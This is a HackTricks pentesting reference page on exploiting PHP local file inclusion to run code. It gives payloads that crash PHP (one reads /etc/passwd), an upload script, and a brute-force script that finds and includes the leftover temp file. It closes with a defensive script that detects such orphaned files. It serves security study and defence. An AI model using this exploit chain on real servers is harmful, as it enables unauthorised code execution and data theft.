hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
2024-02-11 02:13:58 +00:00

LFI2RCE via Segmentation Fault

According to the writeups https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (second part) and https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, the following payloads caused a segmentation fault in PHP:

```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```

You should know that if you send a POST request containing a file, PHP creates a temporary file in /tmp/php<something> with the contents of that file. This file is deleted automatically once the request has been processed.

If you find an LFI and manage to trigger a segmentation fault in PHP, the temporary file will never be deleted. Therefore, you can search for it through the LFI vulnerability until you find it and execute arbitrary code.

You can use the docker image https://hub.docker.com/r/easyengine/php7.0 for testing.

```python
# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)
```


```python
# Search for the file (improve this with threads)
import itertools
import string

import requests

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
    # The temp file is /tmp/php followed by 6 random characters
    for combo in itertools.product(charset, repeat=6):
        filename = "".join(combo)
        url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
        print(url)
        response = requests.get(url)
        # 'spyd3r' is the string checked for in the response body
        if 'spyd3r' in response.text:
            print("[+] Include success!")
            return True
    return False


def main():
    bruteforce(charset)

if __name__ == "__main__":
    main()
```
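The leftover temp files described above are also a detectable artifact on the server. The following is an added example (not code from the original page or the referenced writeups) that scans an upload temp directory for stale `php` + six-character files and flags those containing a PHP open tag. The function names, the 60-second age threshold and the sample files are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile
import time

# PHP names upload temp files "php" + 6 random alphanumeric characters.
TMP_NAME = re.compile(r"^php[A-Za-z0-9]{6}$")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def find_orphaned_uploads(tmp_dir, max_age=60, now=None):
    """Return [(path, age_seconds, has_php_tag)] for upload temp files older than max_age."""
    # A healthy worker deletes the temp file when the request ends, so an old
    # one suggests the worker crashed mid-request (max_age is an assumed threshold).
    now = time.time() if now is None else now
    findings = []
    for entry in os.scandir(tmp_dir):
        if not TMP_NAME.match(entry.name):
            continue
        if not entry.is_file(follow_symlinks=False):
            continue
        age = now - entry.stat(follow_symlinks=False).st_mtime
        if age < max_age:
            continue  # may belong to a request still in flight
        with open(entry.path, "rb") as fh:
            has_tag = bool(PHP_TAG.search(fh.read(65536)))
        findings.append((entry.path, int(age), has_tag))
    return sorted(findings)

def build_sample_dir():
    """Constructed sample data: two orphaned files, one fresh upload, one unrelated file."""
    d = tempfile.mkdtemp()
    samples = {
        "phpA1b2C3": (b"<?php echo 'constructed sample'; ?>", 3600),
        "phpZz9Yy8": (b"\x89PNG constructed sample bytes", 7200),
        "phpQq1Ww2": (b"<?php /* in-flight upload */ ?>", 0),
        "session_x": (b"not an upload temp file", 9999),
    }
    now = time.time()
    for name, (data, age) in samples.items():
        path = os.path.join(d, name)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (now - age, now - age))
    return d

if __name__ == "__main__":
    for path, age, has_tag in find_orphaned_uploads(build_sample_dir()):
        print(f"{path} age={age}s php_tag={has_tag}")
```

Point `tmp_dir` at the directory configured as `upload_tmp_dir` (or the system temp directory when it is unset) and run it on a schedule; correlating hits with PHP worker crash entries in the server logs narrows down the triggering request.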